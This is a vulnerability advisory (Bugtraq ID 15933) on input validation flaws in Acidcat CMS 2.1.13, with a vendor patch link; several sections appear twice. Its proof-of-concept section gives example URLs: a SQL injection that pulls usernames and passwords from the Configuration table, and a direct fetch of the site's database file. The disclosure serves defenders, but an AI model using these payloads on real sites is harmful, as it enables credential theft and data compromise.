Acidcat CMS Multiple Input Validation Vulnerabilities
BID:15933
Info
Acidcat CMS Multiple Input Validation Vulnerabilities
| Bugtraq ID: | 15933 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 19 2005 12:00AM |
| Updated: | Dec 19 2005 12:00AM |
| Credit: | [email protected] is credited with the discovery of this vulnerability. |
| Vulnerable: |
Acidcat CMS 2.1.13 |
| Not Vulnerable: | |
Discussion
Acidcat CMS Multiple Input Validation Vulnerabilities
Acidcat CMS is prone to multiple input validation vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
Acidcat CMS version 2.1.13 and prior are vulnerable; other versions may also be affected.
Acidcat CMS is prone to multiple input validation vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input.
Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
Acidcat CMS version 2.1.13 and prior are vulnerable; other versions may also be affected.
Exploit / POC
Acidcat CMS Multiple Input Validation Vulnerabilities
No exploit is required.
Example URI have been provided:
http://www.example.com/acidcat/default.asp?ID=1'
http://www.example.com/acidcat/default.asp?ID=26 union select 1,username,3,password,5,6 from Configuration
http://www.example.com/acidcat/databases/acidcat.mdb
No exploit is required.
Example URI have been provided:
http://www.example.com/acidcat/default.asp?ID=1'
http://www.example.com/acidcat/default.asp?ID=26 union select 1,username,3,password,5,6 from Configuration
http://www.example.com/acidcat/databases/acidcat.mdb
Solution / Fix
Acidcat CMS Multiple Input Validation Vulnerabilities
Solution:
The vendor has released a patch for version 2.1.13 to address the issue.
Acidcat CMS 2.1.13
Solution:
The vendor has released a patch for version 2.1.13 to address the issue.
Acidcat CMS 2.1.13
-
Acidcat acidcat_2_1_14_patch.zip
http://www.acidcat.com/acidcat/downloads/acidcat_2_1_14_patch.zip
References
Acidcat CMS Multiple Input Validation Vulnerabilities
References:
References: